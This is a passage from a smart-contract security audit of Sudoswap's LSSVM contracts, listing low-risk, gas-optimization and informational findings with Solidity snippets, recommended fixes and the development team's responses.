Description: ERC721 NFTs may get locked forever if the recipient is not aware of ERC721 for some reason. While safeTransferFrom() is used for ERC1155 NFTs (it performs the _doSafeTransferAcceptanceCheck on the recipient and there is no option to avoid it), transferFrom() is used for ERC721 NFTs, presumably for gas savings and reentrancy concerns over its safeTransferFrom variant (which performs the _checkOnERC721Received check on the recipient).
Recommendation: Evaluate using ERC721 safeTransferFrom() to avoid NFTs getting stuck, weighed against its reentrancy risk and gas costs.
Sudorandom Labs: Acknowledged, this is an acceptable risk for us given the gas savings and reduced reentrancy surface.
Spearbit: Acknowledged.
+5.3.25 Single-step ownership change introduces risks
Severity: Low Risk
Context: LSSVMPairFactory.sol#L39, OwnableWithTransferCallback.sol#L68-L71
Description: Single-step ownership transfers add the risk of setting an unwanted owner by accident (this includes address(0)) if the ownership transfer is not done with excessive care. The ownership control library Owned by Solmate implements a simple single-step ownership transfer without zero-address checks.
Recommendation: Consider employing a two-step ownership transfer mechanism for this critical ownership, such as OpenZeppelin's Ownable2Step or Synthetix's Owned (see the sketch below).
Sudorandom Labs: Acknowledged, the risk is acceptable for us here, as ownership is transferred to callers on the factory call. As it is caller-initiated, the risk of unintended owners being set is reduced.
Spearbit: Acknowledged.
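For 5.3.25, a minimal two-step ownership sketch in the spirit of OpenZeppelin's Ownable2Step; this is illustrative, not the codebase's OwnableWithTransferCallback:
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    contract TwoStepOwnedSketch {
        address public owner;
        address public pendingOwner;

        event OwnershipTransferStarted(address indexed from, address indexed to);
        event OwnershipTransferred(address indexed from, address indexed to);

        constructor() { owner = msg.sender; }

        function transferOwnership(address newOwner) external {
            require(msg.sender == owner, "UNAUTHORIZED");
            // A typo here is recoverable: nothing changes until acceptance.
            pendingOwner = newOwner;
            emit OwnershipTransferStarted(owner, newOwner);
        }

        function acceptOwnership() external {
            require(msg.sender == pendingOwner, "NOT_PENDING_OWNER");
            emit OwnershipTransferred(owner, msg.sender);
            owner = msg.sender;
            delete pendingOwner;
        }
    }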
+5.3.26 getAllPairsForSettings() may run out of gas
Severity: Low Risk
Context: LSSVMPairFactory.sol#L531-L541
Description: The function getAllPairsForSettings() loops over pairsForSettings. As the creation of pairs is permissionless, that array could get arbitrarily large. Once the array is large enough, the function will run out of gas. Note: the function is only called from the outside.
    function getAllPairsForSettings(address settings) external view returns (address[] memory) {
        uint256 numPairs = pairsForSettings[settings].length();
        ...
        for (uint256 i; i < numPairs;) {
            ...
            unchecked { ++i; }
        }
        ...
    }
Recommendation: Make sure alternative ways exist to retrieve this information in the (unlikely) case that the function runs out of gas (a paginated sketch follows 5.3.28 below).
Sudorandom Labs: This function is meant to be used externally only, so we're not worried about that.
Spearbit: Acknowledged.
+5.3.27 Partially implemented SellOrderWithPartialFill functionality may cause unexpected behavior
Severity: Low Risk
Context: VeryFastRouter.sol#L276-L291, VeryFastRouter.sol#L78-L95
Description: A SellOrderWithPartialFill cannot be performed, and sell orders will only be executed if pair.spotPrice() == order.expectedSpotPrice in a swap. This may be confusing to users who expect partial fills in both directions but observe unexpected behavior if the code is deployed as-is. While the BuyOrderWithPartialFill functionality is fully implemented, the corresponding SellOrderWithPartialFill feature is only partially implemented, with getNFTQuoteForSellOrderWithPartialFill, an incomplete _findMaxFillableAmtForSell (placeholder comment: "// TODO: implement") and other supporting logic required in swap().
Recommendation: Complete the implementation of the SellOrderWithPartialFill feature.
Sudorandom Labs: Acknowledged, now addressed in the open PR#27.
Spearbit: Verified that this is fixed by PR#27.
+5.3.28 Lack of deadline checks for certain swap functions allows greater exposure to volatile market prices
Severity: Low Risk
Context: LSSVMRouter.sol#L46-L49, LSSVMRouter.sol#L327-L332, LSSVMRouter.sol#L410-L415, LSSVMRouter.sol#L552-L554
Description: Many swap functions in LSSVMRouter use the checkDeadline modifier to prevent swaps from executing beyond a certain user-specified deadline, presumably to reduce exposure to volatile market prices on top of the thresholds of maxCost for buys and minOutput for sells. However, two router functions, robustSwapETHForSpecificNFTsAndNFTsToToken and robustSwapERC20ForSpecificNFTsAndNFTsToToken in LSSVMRouter, as well as all functions in VeryFastRouter, are missing this modifier and the user parameter required for it. Users attempting to swap using these functions have no way to specify a deadline for their execution, unlike with the other swap functions in this router. If the front-end does not highlight or warn about this, the swaps may get executed after a long time, depending on the tip included in the transaction and the network congestion. This causes greater exposure of the swaps to volatile market prices.
Recommendation: Add a deadline field to struct RobustPairNFTsFoTokenAndTokenforNFTsTrade and use it with the checkDeadline modifier, similar to the other swap functions. Consider adding the same feature to the swap functions in VeryFastRouter.
Sudorandom Labs: Acknowledged, no change. The intent is for users to use the minInput/maxOutput amounts (or e.g. update their nonce) to protect against price changes. Execution over a longer time frame (but within the specified price range) is an acceptable end result.
Spearbit: Acknowledged.
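For 5.3.26, a sketch of a paginated variant that off-chain callers could fall back on; a plain address array is assumed in place of the factory's actual storage:
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    contract PaginatedPairsSketch {
        mapping(address => address[]) internal pairsForSettings;

        function getPairsForSettings(address settings, uint256 start, uint256 count)
            external
            view
            returns (address[] memory page)
        {
            address[] storage all = pairsForSettings[settings];
            uint256 end = start + count;
            if (end > all.length) end = all.length;
            // Bounded slice: callers page through, so no single call has to
            // iterate over the whole (arbitrarily large) array.
            page = new address[](end - start);
            for (uint256 i = start; i < end;) {
                page[i - start] = all[i];
                unchecked { ++i; }
            }
        }
    }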
+5.3.29 Missing function to deposit ERC1155 NFTs after pair creation
Severity: Low Risk
Context: LSSVMPairFactory.sol#L650-L676
Description: Functions depositNFTs() and depositERC20() are used to deposit ERC721 NFTs and ERC20 tokens into appropriate pairs after their creation. According to the project team, this is used "for various UIs to consolidate approvals + emit a canonical event for deposits." However, an equivalent function for depositing ERC1155 NFTs is missing. This prevents ERC1155 NFTs from being deposited into pairs after creation in scenarios analogous to those anticipated for ERC721 NFTs and ERC20 tokens.
Recommendation: Add a depositNFTs() equivalent for ERC1155 NFTs.
Sudorandom Labs: Solved in PR#65.
Spearbit: Verified that this is fixed by PR#65.
5.4 Gas Optimization
+5.4.1 Reading from state is more gas expensive than using msg.sender
Severity: Gas Optimization
Context: LSSVMPairETH.sol#L113-L123
Description: Solmate's Owned.sol contract implements the concept of ownership (by saving the deployer into the owner state variable during contract construction) and owner-exclusive functions via the onlyOwner() modifier. Within functions protected by the onlyOwner() modifier, the addresses in msg.sender and owner will therefore be equal. So, if such a function has to make use of the owner's address, it is cheaper to use msg.sender than owner(), because the latter reads from contract state (the SLOAD opcode, which costs either 100 or 2100 gas units) while the former doesn't (the address is retrieved directly via the cheaper CALLER opcode, which costs 2 gas units). Note: withdrawERC20() already uses msg.sender.
    function withdrawETH(uint256 amount) public onlyOwner {
        payable(owner()).safeTransferETH(amount);
        ...
    }
    function withdrawERC20(ERC20 a, uint256 amount) external override onlyOwner {
        a.safeTransfer(msg.sender, amount);
    }
Recommendation: Consider replacing owner() with msg.sender to avoid reading from storage:
    function withdrawETH(uint256 amount) public onlyOwner {
    -   payable(owner()).safeTransferETH(amount);
    +   payable(msg.sender).safeTransferETH(amount);
        ...
    }
Sudorandom Labs: Solved in PR#53.
Spearbit: Verified that this is fixed by PR#53.
+5.4.2 pair.factory().protocolFeeMultiplier() is read from storage on every iteration of the loop wasting gas
Severity: Gas Optimization
Context: VeryFastRouter.sol#L67, VeryFastRouter.sol#L93
Description: Not caching storage variables that are accessed multiple times within a loop wastes gas. If the value is not cached, the Solidity compiler will read protocolFeeMultiplier from storage on each iteration. For a storage variable, this implies extra SLOAD operations (100 additional gas for each iteration beyond the first); for a memory variable, it would only imply extra MLOAD operations (3 additional gas for each iteration beyond the first).
Recommendation: Consider caching pair.factory().protocolFeeMultiplier() to save gas (a sketch follows below).
Sudorandom Labs: Acknowledged, these functions are intended to be used off-chain.
Spearbit: Acknowledged.
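A sketch of the caching suggested in 5.4.2; the interfaces are trimmed to what the example needs, and the per-item math is a stand-in:
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    interface IFactoryLike {
        function protocolFeeMultiplier() external view returns (uint256);
    }

    interface IPairLike {
        function factory() external view returns (IFactoryLike);
    }

    contract FeeCacheSketch {
        function sumFees(IPairLike pair, uint256 numNFTs) external view returns (uint256 total) {
            // One external call (and one underlying SLOAD) instead of one per iteration.
            uint256 protocolFeeMultiplier = pair.factory().protocolFeeMultiplier();
            for (uint256 i; i < numNFTs;) {
                total += protocolFeeMultiplier; // stand-in for the per-item quote math
                unchecked { ++i; }
            }
        }
    }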
+5.4.3 The use of factory in ERC1155._takeNFTsFromSender() can be via a parameter rather than calling factory() again
Severity: Gas Optimization
Context: LSSVMPairERC1155.sol#L181, LSSVMPairERC721.sol#L179
Description: factory is passed as a parameter to _takeNFTsFromSender in LSSVMPairERC721.sol#L179, which saves gas because the value does not have to be read again:
    _takeNFTsFromSender(IERC721(nft()), nftIds, _factory, isRouter, routerCaller);
However, in LSSVMPairERC1155.sol#L181 the similar function _takeNFTsFromSender() gets the value by calling factory() instead of using a parameter:
    _takeNFTsFromSender(IERC1155(nft()), numNFTs[0], isRouter, routerCaller);
This creates an unnecessary asymmetry between two contracts which are expected to be similar, and misses a possible gas optimization by avoiding a call to the factory getter.
Recommendation: Add a _factory parameter to LSSVMPairERC1155.sol#L222.
Sudorandom Labs: Solved in PR#51.
Spearbit: Verified that this is fixed by PR#51.
+5.4.4 Variables only set at construction time could be made immutable
Severity: Gas Optimization
Context: RoyaltyEngine.sol#L50
Description: immutable variables can be assigned either at construction time or at declaration time, and only once. The contract creation code generated by the compiler will modify the contract's runtime code before it is returned, replacing all references to immutable variables with the values assigned to them; the compiler therefore does not reserve a storage slot for these variables. Declaring variables that are only set at construction time as immutable saves one SSTORE (0x55) per variable during construction.
Recommendation: royaltyRegistry could be declared as immutable because it is only set in the constructor, saving some gas in the process:
    - address public royaltyRegistry;
    + address public immutable royaltyRegistry;
Sudorandom Labs: Solved in PR#56.
Spearbit: Verified that this is fixed by PR#56.
+5.4.5 Hoisting check out of loop will save gas
Severity: Gas Optimization
Context: VeryFastRouter.sol#L312-L320
Description: The check numIdsFound == maxIdsNeeded can never be true before the outer for loop finishes iterating over maxIdsNeeded, because numIdsFound is conditionally incremented by at most 1 in each iteration.
Recommendation: Hoist the check and the accompanying return idsThatExist; out of the for loop to save gas.
Sudorandom Labs: Solved in PR#56.
Spearbit: Verified that this is fixed by PR#56.
+5.4.6 Functionality of safeBatchTransferFrom() is not used
Severity: Gas Optimization
Context: LSSVMRouter.sol#L531-L543
Description: The function pairTransferERC1155From() allows the transfer of multiple ids of ERC1155 NFTs, but the rest of the code only uses one id at a time. Using safeTransferFrom() instead of safeBatchTransferFrom() might be better, as it only accesses one id and uses less gas because no for loop is necessary. However, future versions of Sudoswap might support multiple ids; in that case it is better to leave the code as-is.
    function pairTransferERC1155From(..., uint256[] calldata ids, uint256[] calldata amounts, ...) ... {
        ...
        nft.safeBatchTransferFrom(from, to, ids, amounts, bytes(""));
    }
Recommendation: Consider using safeTransferFrom() instead of safeBatchTransferFrom().
Sudorandom Labs: No change for now.
Spearbit: Acknowledged.
+5.4.7 Using != 0 instead of > 0 can save gas
Severity: Gas Optimization
Context: LSSVMPairERC721.sol#L42, LSSVMPairERC721.sol#L149, LSSVMPairERC1155.sol#L52, LSSVMPairERC1155.sol#L103, LSSVMPairERC1155.sol#L151, LSSVMPairERC20.sol#L109, LSSVMPairETH.sol#L48, LSSVMPairETH.sol#L86, LSSVMPairFactory.sol#L588, LSSVMRouter.sol#L231, LSSVMRouter.sol#L361, LSSVMRouter.sol#L596, LSSVMRouter2.sol#L83, LSSVMRouter2.sol#L185, LSSVMRouter2.sol#L381, LSSVMRouter2.sol#L452, LSSVMRouter2.sol#L485, VeryFastRouter.sol#L146, VeryFastRouter.sol#L161, VeryFastRouter.sol#L170, VeryFastRouter.sol#L174, VeryFastRouter.sol#L201, VeryFastRouter.sol#L209
Description: When dealing with unsigned integer types, comparisons with != 0 are 3 gas cheaper than > 0.
Recommendation: Use != 0 instead of > 0 for comparisons with unsigned integer types where appropriate.
Sudorandom Labs: Addressed in PR#92. LSSVMRouter changes not addressed because it is intended to be deprecated.
Spearbit: Verified that this is fixed by PR#92.
+5.4.8 Using >>1 instead of /2 can save gas
Severity: Gas Optimization
Context: LinearCurve.sol#L76, LinearCurve.sol#L144, LSSVMRouter2.sol#L246, LSSVMRouter2.sol#L280, VeryFastRouter.sol#L251, VeryFastRouter.sol#L256, VeryFastRouter.sol#L257, VeryFastRouter.sol#L261
Description: A division by 2 can be computed by shifting right by one (>>1). While the DIV opcode uses 5 gas, the SHR opcode only uses 3 gas.
Recommendation: Consider using shift-right for a tiny gas optimization (note the parentheses, since the shift operator binds less tightly than subtraction):
    - end = (start + end) / 2 - 1;
    + end = ((start + end) >> 1) - 1;
Sudorandom Labs: Acknowledged, no change for now as we only use /2 sparingly, and the readability is preferred.
Spearbit: Acknowledged.
+5.4.9 Retrieval of ether balance of contract can be gas optimized
Severity: Gas Optimization
Context: Splitter.sol#L27
Description: The retrieval of the ether balance of a contract is typically done with address(this).balance. However, by using an assembly block and the selfbalance() instruction, one can get the balance at a discount of 15 gas units.
Recommendation: Consider using an assembly block to retrieve the contract's own balance. See below:
    - uint256 ethBalance = address(this).balance;
    + uint256 ethBalance;
    + assembly {
    +     ethBalance := selfbalance()
    + }
Sudorandom Labs: Acknowledged, no change for now.
Spearbit: Acknowledged.
+5.4.10 Function parameters should be validated at the very beginning for gas optimizations
Severity: Gas Optimization
Context: LSSVMPair.sol#L587, LSSVMPair.sol#L600, LSSVMPair.sol#L616
Description: Function parameters should be validated at the very beginning of the function, so that typical execution paths proceed and exceptional paths revert early; this leads to gas savings over validating later.
Recommendation: Add the function parameter checks at the very beginning. For example:
    function changeSpotPrice(uint128 newSpotPrice) external onlyOwner {
    +   if (spotPrice == newSpotPrice) {
    +       revert CustomError();
    +   }
        ICurve _bondingCurve = bondingCurve();
        require(_bondingCurve.validateSpotPrice(newSpotPrice), "Invalid new spot price for curve");
    -   if (spotPrice != newSpotPrice) {
            spotPrice = newSpotPrice;
            emit SpotPriceUpdate(newSpotPrice);
    -   }
    }
Sudorandom Labs: Acknowledged, no change for now.
Spearbit: Acknowledged.
+5.4.11 Loop counters are not gas optimized in some places
Severity: Gas Optimization
Context: LSSVMRouter2.sol#L88, LSSVMRouter2.sol#L96, MerklePropertyChecker.sol#L22, RangePropertyChecker.sol#L28, RoyaltyEngine.sol#L81, RoyaltyEngine.sol#L180, RoyaltyEngine.sol#L268, RoyaltyEngine.sol#L321, VeryFastRouter.sol#L61, VeryFastRouter.sol#L69, VeryFastRouter.sol#L83, VeryFastRouter.sol#L91, VeryFastRouter.sol#L106, VeryFastRouter.sol#L151, VeryFastRouter.sol#L312
Description: Loop counters are optimized in many parts of the code by using unchecked { ++i } (unchecked plus prefix increment). However, this is not done in some places where it is safe to do so.
Recommendation: Use the following style for loop counter increments consistently:
    for (uint256 i; i < cachedArrayLength;) {
        ...
        unchecked { ++i; }
    }
Sudorandom Labs: Solved in PR#68 and PR#93.
Spearbit: Verified that this is fixed by PR#68 and PR#93.
+5.4.12 Mixed use of custom errors and revert strings is inconsistent and uses extra gas
Severity: Gas Optimization
Context: LSSVMPair.sol, LSSVMPairERC20.sol, LSSVMPairERC721.sol#L149, LSSVMPairERC1155.sol, LSSVMPairETH.sol, LSSVMPairFactory.sol, LSSVMRouter.sol, LSSVMRouter2.sol#L75, VeryFastRouter.sol, RoyaltyEngine.sol
Description: In some parts of the code, custom errors are declared and used (the CurveErrorCodes and Ownable errors), while in other parts classic revert strings are used in require statements. Using custom errors instead of error strings would reduce deployment and runtime costs, and using them everywhere would improve consistency. It would also avoid long revert strings, which consume extra gas: each memory word of a string beyond the original 32 bytes incurs an MSTORE, which costs 3 gas. This happens at LSSVMPair.sol#L133, LSSVMPair.sol#L666 and LSSVMPairFactory.sol#L505.
Recommendation: Consider using one type of error message consistently, preferably custom errors, for gas efficiency and other benefits.
Sudorandom Labs: Acknowledged, but no change at this time.
Spearbit: Acknowledged.
+5.4.13 Array length read in each iteration of the loop wastes gas
Severity: Gas Optimization
Context: LSSVMPair.sol, LSSVMPairERC20.sol, LSSVMPairERC721.sol, LSSVMPairERC1155.sol, LSSVMPairETH.sol, LSSVMPairFactory.sol, LSSVMRouter.sol, LSSVMRouter2.sol, VeryFastRouter.sol, RoyaltyEngine.sol
Description: If not cached, the Solidity compiler will read the length of the array in each iteration. For a storage array, this implies extra SLOAD operations (100 additional gas for each iteration beyond the first); for a memory array, extra MLOAD operations (3 additional gas for each iteration beyond the first).
Recommendation: Cache the array length outside of the loop and use that variable in the loop:
    + uint256 _royaltyRecipientsLength = royaltyRecipients.length;
    - for (uint256 i; i < royaltyRecipients.length;) {
    + for (uint256 i; i < _royaltyRecipientsLength;) {
          ...
      }
Sudorandom Labs: Acknowledged, partially addressed in PR#82. The rest would either lead to stack-too-deep issues or are usually called with 1-3 arguments, so caching will not save much gas.
Spearbit: Acknowledged.
+5.4.14 Not tightly packing struct variables consumes extra storage slots and gas
Severity: Gas Optimization
Context: VeryFastRouter.sol#L22-L30
Description: Gas efficiency can be achieved by tightly packing structs. Struct variables are stored in 32-byte slots, so smaller types can be grouped to occupy fewer slots.
Recommendation: Pack the bools together so they use fewer slots (a sketch follows below).
Sudorandom Labs: Acknowledged, no change for now.
Spearbit: Acknowledged.
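A sketch of the packing suggested in 5.4.14; the field set is illustrative, not VeryFastRouter's actual struct:
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    contract PackingSketch {
        // Before: bools interleaved with 32-byte fields take 4 storage slots.
        struct Loose {
            uint256 amount;   // slot 0
            bool isETH;       // slot 1 (alone, since the next field needs a full slot)
            uint256 deadline; // slot 2
            bool doCheck;     // slot 3
        }

        // After: small types grouped at the end take 3 storage slots.
        struct Packed {
            uint256 amount;   // slot 0
            uint256 deadline; // slot 1
            bool isETH;       // slot 2
            bool doCheck;     // slot 2 (shares the slot)
        }
    }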
+5.4.15 Variables that are redeclared in each loop iteration can be declared once outside the loop
Severity: Gas Optimization
Context: VeryFastRouter.sol#L62
Description: price is redeclared in each iteration of the loop and set to a new value right after declaration:
    for (uint256 i; i < numNFTs; i++) {
        uint256 price;
        (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, pair.factory().protocolFeeMultiplier());
        ...
    }
Recommendation: The declaration of price can be moved before the loop for gas optimization:
    + uint256 price;
      for (uint256 i; i < numNFTs; i++) {
    -     uint256 price;
          (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, pair.factory().protocolFeeMultiplier());
          ...
      }
Sudorandom Labs: Acknowledged, no change as this is intended to be called only by clients.
Spearbit: Acknowledged.
5.5 Informational
+5.5.1 Caller of swapTokenForSpecificNFTs() must be able to receive ETH
Severity: Informational
Context: LSSVMPairETH.sol#L76-L81
Description: The function _refundTokenToSender() sends ETH back to the caller. If the caller is a contract, it might not be able to receive ETH; in that case the transaction will revert.
    function _refundTokenToSender(uint256 inputAmount) internal override {
        // Give excess ETH back to caller
        if (msg.value > inputAmount) {
            payable(msg.sender).safeTransferETH(msg.value - inputAmount);
        }
    }
Recommendation: Document the requirement that the caller must be able to receive ETH (a sketch follows 5.5.3 below).
Sudorandom Labs: Addressed in PR#76.
Spearbit: Verified that this is fixed by PR#76.
+5.5.2 order.doPropertyCheck could be replaced by the pair's propertyChecker()
Severity: Informational
Context: VeryFastRouter.sol#L120, VeryFastRouter.sol#L134
Description: The field and check for a separate order.doPropertyCheck in struct SellOrder are unnecessary, because this can already be checked via the pair's propertyChecker() without relying on the user to explicitly specify it in their order.
Recommendation: Consider removing the field and check for order.doPropertyCheck and replacing them with the pair's propertyChecker(), to save a struct field and to avoid relying on the user's input.
Sudorandom Labs: Acknowledged, no change for now. The current approach is intended to save a bit of gas (no need to call propertyChecker()), and the risk is bounded (the transaction just reverts).
Spearbit: Acknowledged.
+5.5.3 _payProtocolFeeFromPair() could be replaced with _sendTokenOutput()
Severity: Informational
Context: LSSVMPairERC20.sol#L123-L129, LSSVMPairERC20.sol#L132-L137, LSSVMPairETH.sol#L84-L89, LSSVMPairETH.sol#L92-L97
Description: Both the ERC20 and ETH versions of _payProtocolFeeFromPair() and _sendTokenOutput() are identical in their parameters and logic.
Recommendation: _payProtocolFeeFromPair() could be replaced with the more generic _sendTokenOutput() for simplicity and readability.
Sudorandom Labs: Solved in PR#50.
Spearbit: Verified that this is fixed by PR#50.
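For 5.5.1, a minimal sketch of a contract caller that satisfies the documented requirement:
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    contract SwapCallerSketch {
        // Without a payable receive function, the refund in
        // _refundTokenToSender() would revert and undo the whole swap.
        receive() external payable {}
    }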
"https://raw.githubusercontent.com/transmissions11/solmate/main/src/utils/FixedPointMathLib.sol"; contract test{ using FixedPointMathLib for uint256; constructor() { uint256 delta = FixedPointMathLib.WAD; uint256 invDelta = FixedPointMathLib.WAD.divWadDown(delta); uint outputValue = delta.divWadDown(FixedPointMathLib.WAD - invDelta); // revert } } Recommendation: Consider the following change within the test - if (delta < FixedPointMathLib.WAD || spotPrice < MIN_PRICE || numItems == 0) { + if (delta <= FixedPointMathLib.WAD || spotPrice < MIN_PRICE || numItems == 0) { return; } Sudorandom Labs: Solved in PR#48. Spearbit: Verified that this is fixed by PR#48. +5.5.5 Checks-Effects-Interactions pattern not used in swapNFTsForToken() Severity: Informational Context: LSSVMPairERC1155.sol#L181, LSSVMPairERC721.sol#L179 Description: It is a defensive programming pattern to first take NFTs and then send the tokens (i.e. the Checks- Effects-Interactions pattern). function swapNFTsForToken(...) ... { ... _sendTokenOutput(tokenRecipient, outputAmount); ... _sendTokenOutput(royaltyRecipients[i], royaltyAmounts[i]); ... _payProtocolFeeFromPair(_factory, protocolFee); ... _takeNFTsFromSender(...); ... } Recommendation: In both versions of swapNFTsForToken() change the order in the following way: 43 function swapNFTsForToken(...) ... { ... _takeNFTsFromSender(...); + ... _sendTokenOutput(tokenRecipient, outputAmount); ... _sendTokenOutput(royaltyRecipients[i], royaltyAmounts[i]); ... _payProtocolFeeFromPair(_factory, protocolFee); ... _takeNFTsFromSender(...); ... - } Sudorandom Labs: Addressed in PR#73. Spearbit: Verified that this is fixed by PR#73. +5.5.6 Two versions of withdrawERC721() and withdrawERC1155() Severity: Informational Context: LSSVMPairERC721.sol#L272-L299, LSSVMPairERC1155.sol#L257-L301 Both the contracts LSSVMPairERC721 and LSSVMPairERC1155 contain the functions Description: withdrawERC721() and withdrawERC1155() with slightly different implementations. This is more difficult to maintain. Recommendation: Consider integrating the different versions of the functions withdrawERC721() and withdraw- ERC1155() and move them to a library. Note: moving the functions to LSSVMPair doesn't work due to multiple inheritance issues. Sudorandom Labs: Acknowledged, no change for now. Spearbit: Acknowledged. +5.5.7 Missing sanity/threshold checks may cause undesirable behavior and/or waste of gas Severity: Informational Context: LSSVMPairERC1155.sol#L49-53 Description: Numerical user inputs and external call returns that are subject to thresholds due to the contract's logic should be checked for sanity to avoid undesirable behavior or reverts in later logic and wasting unnecessary gas in the process. Recommendation: Consider adding require(numNFTs <= _nft.balanceOf(address(this), nftId()), "Ask for <= balanceOf NFTs") Sudorandom Labs: Acknowledged, no change for now. Spearbit: Acknowledged. 44 +5.5.8 Deviation from standard/uniform naming convention affects readability Severity: Informational LSSVMPairFactory.sol#L471, LSSVMRouter.sol#L128-L135, Context: LSSVMRouter.sol#L145-L152, LSSVMPairERC721.sol#L71-L83, LSSVMPairERC721.sol#L99-L115, PropertyCheckerFactory.sol#L32-L41, RangePropertyChecker.sol#L7-L36, LSSVMPairFactory.sol#L67, LSSVMPairERC1155.sol#86, LSSVMPairERC1155.sol#L212 LSSVMPairERC20.sol#L34-L115, LSSVMRouter.sol#L69-L75, Description: Following standard/uniform naming conventions are essential to make a codebase easy to read and understand. 
+5.5.8 Deviation from standard/uniform naming convention affects readability
Severity: Informational
Context: LSSVMRouter.sol#L69-L75, LSSVMRouter.sol#L128-L135, LSSVMRouter.sol#L145-L152, LSSVMPairERC721.sol#L71-L83, LSSVMPairERC721.sol#L99-L115, LSSVMPairERC20.sol#L34-L115, LSSVMPairERC1155.sol#L86, LSSVMPairERC1155.sol#L212, LSSVMPairFactory.sol#L67, LSSVMPairFactory.sol#L471, PropertyCheckerFactory.sol#L32-L41, RangePropertyChecker.sol#L7-L36
Description: Following standard/uniform naming conventions is essential to make a codebase easy to read and understand.
Recommendation: Here are some suggestions that would improve the codebase's readability and quality:
• LSSVMRouter.sol#L69-L75, LSSVMRouter.sol#L128-L135, LSSVMRouter.sol#L145-L152, LSSVMPairERC721.sol#L71-L83, LSSVMPairERC721.sol#L99-L115: for consistency/clarity, assign to the named return variable instead of using an explicit return.
• MerklePropertyChecker.sol#L18-L28 and RangePropertyChecker.sol#L24-L35: for consistency/clarity, assign to the named return variable instead of using an explicit return.
• LSSVMPair.sol#L315-L328: for consistency/clarity, assign to the named return variable instead of using an explicit return.
• LSSVMPairFactory.sol#L471: the function could be named more specifically (e.g. getSettingsRoyaltyForPair), because it specifically returns the royalty aspect of setting benefits and not the setting requirements of upfront fee, fee splits and lockup duration.
• LSSVMPairERC20.sol#L34-L115: the function could be named more specifically, as it also pulls royalties.
• PropertyCheckerFactory.sol#L32-L41: the function arguments lowerBound/upperBound could be renamed to start/end.
• RangePropertyChecker.sol#L7-L36: variables and function names referencing lowerBound/upperBound could accordingly be renamed to reference start/end.
• LSSVMPairFactory.sol#L67: the field wasEverAllowed of struct RouterStatus could be named more specifically (e.g. wasEverTouched). The current name can be confusing, because the RouterStatus struct can be declared with isAllowed == false.
• LSSVMPairERC1155.sol#L86: the function swapTokenForAnyNFTs() should be renamed to swapTokenForSpecificNFTs() for consistency with its ERC721 counterpart.
• LSSVMPairERC1155.sol#L212: the function _sendAnyNFTsToRecipient() should be renamed to _sendSpecificNFTsToRecipient() for consistency with its ERC721 counterpart.
Sudorandom Labs: One suggestion addressed in PR#82, rest acked.
Spearbit: Verified that wasEverAllowed is replaced with wasEverTouched. The rest is acknowledged.
+5.5.9 Function _getRoyaltyAndSpec() contains code duplication which affects maintainability
Severity: Informational
Context: RoyaltyEngine.sol#L132-L313
Description: The function _getRoyaltyAndSpec() is rather long and contains code duplication, which makes it difficult to maintain.
    function _getRoyaltyAndSpec(address tokenAddress, uint256 tokenId, uint256 value) ... {
        if (spec <= NOT_CONFIGURED && spec > NONE) {
            try IArtBlocksOverride(royaltyAddress).getRoyalties(tokenAddress, tokenId) returns (...) {
                // Support Art Blocks override
                require(recipients_.length == bps.length);
                return (recipients_, _computeAmounts(value, bps), ARTBLOCKS, royaltyAddress, addToCache);
            } catch {}
            ...
        } else {
            // Spec exists, just execute the appropriate one
            ...
            if (spec == ARTBLOCKS) {
                // Art Blocks spec
                uint256[] memory bps;
                (recipients, bps) = IArtBlocksOverride(royaltyAddress).getRoyalties(tokenAddress, tokenId);
                require(recipients.length == bps.length);
                return (recipients, _computeAmounts(value, bps), spec, royaltyAddress, addToCache);
            } else ...
        }
    }
Recommendation: Consider splitting _getRoyaltyAndSpec() into smaller pieces where similar code is combined into one smaller function. The use of function pointers might be helpful here.
Sudorandom Labs: Acknowledged, no change. The decision here is to align more closely with the original Manifold code.
Spearbit: Acknowledged.
+5.5.10 getSellInfo always adds 1 rather than rounding, which leads to the last item being sold at 0
Severity: Informational
Context: LinearCurve.sol#L130
Description: The code comment states: "// We calculate how many items we can sell into the linear curve until the spot price reaches 0, rounding up." In the case where delta == spotPrice && numItems > 1, the last item would be sold at 0:
    delta = 100; spotPrice = 100; numItems = 2;
    uint256 totalPriceDecrease = delta * numItems; // = 200
so the check if (spotPrice < totalPriceDecrease) succeeds. Later the code calculates:
    uint256 numItemsTillZeroPrice = spotPrice / delta + 1;
which results in 2, even though the division was an exact 1. So the value is not rounded up in the case where spotPrice == delta; it is always increased by 1.
Recommendation: Correct the difference between the comment and the implemented logic (a worked example follows 5.5.13 below).
Sudorandom Labs: Yes, the comment is inaccurate as you said. The logic is still correct though: in the PoC, the first item is sold for 100, the second is sold for 0, and outputValue = numItems * spotPrice - (numItems * (numItems - 1) * delta) / 2; equals 100, which is correct.
Spearbit: Acknowledged.
+5.5.11 Natspec for robustSwapETHForSpecificNFTs() is slightly misleading
Severity: Informational
Context: LSSVMRouter.sol#L193
Description: The function robustSwapETHForSpecificNFTs() has this comment:
    * @dev We assume msg.value >= sum of values in maxCostPerPair
This doesn't have to be the case; the transaction just reverts if msg.value isn't sufficient.
Recommendation: Consider changing the comment to something like:
    * @dev Supply msg.value >= sum of values in maxCostPerPair to make sure the transaction doesn't revert
Sudorandom Labs: Solved in PR#92.
Spearbit: Verified that this is fixed by PR#92.
+5.5.12 Two copies of pairTransferERC20From(), pairTransferNFTFrom() and pairTransferERC1155From() are present
Severity: Informational
Context: LSSVMRouter.sol#L491-L543, VeryFastRouter.sol#L344-L407
Description: Both contracts LSSVMRouter and VeryFastRouter contain the functions pairTransferERC20From(), pairTransferNFTFrom() and pairTransferERC1155From(). This is more difficult to maintain, as both copies have to stay in sync.
Recommendation: Consider using only one copy of the functions. This can be done via a library or a template from which both contracts inherit.
Sudorandom Labs: We are going to be deprecating LSSVMRouter in favor of VeryFastRouter. Yes, I agree a library would eventually be useful for e.g. making other routers. I'm classifying it as out of scope for now (but something to revisit in the future), as the VeryFastRouter is intended to be the primary router moving forward.
Spearbit: Acknowledged.
+5.5.13 Not using error strings in require statements obfuscates monitoring
Severity: Informational
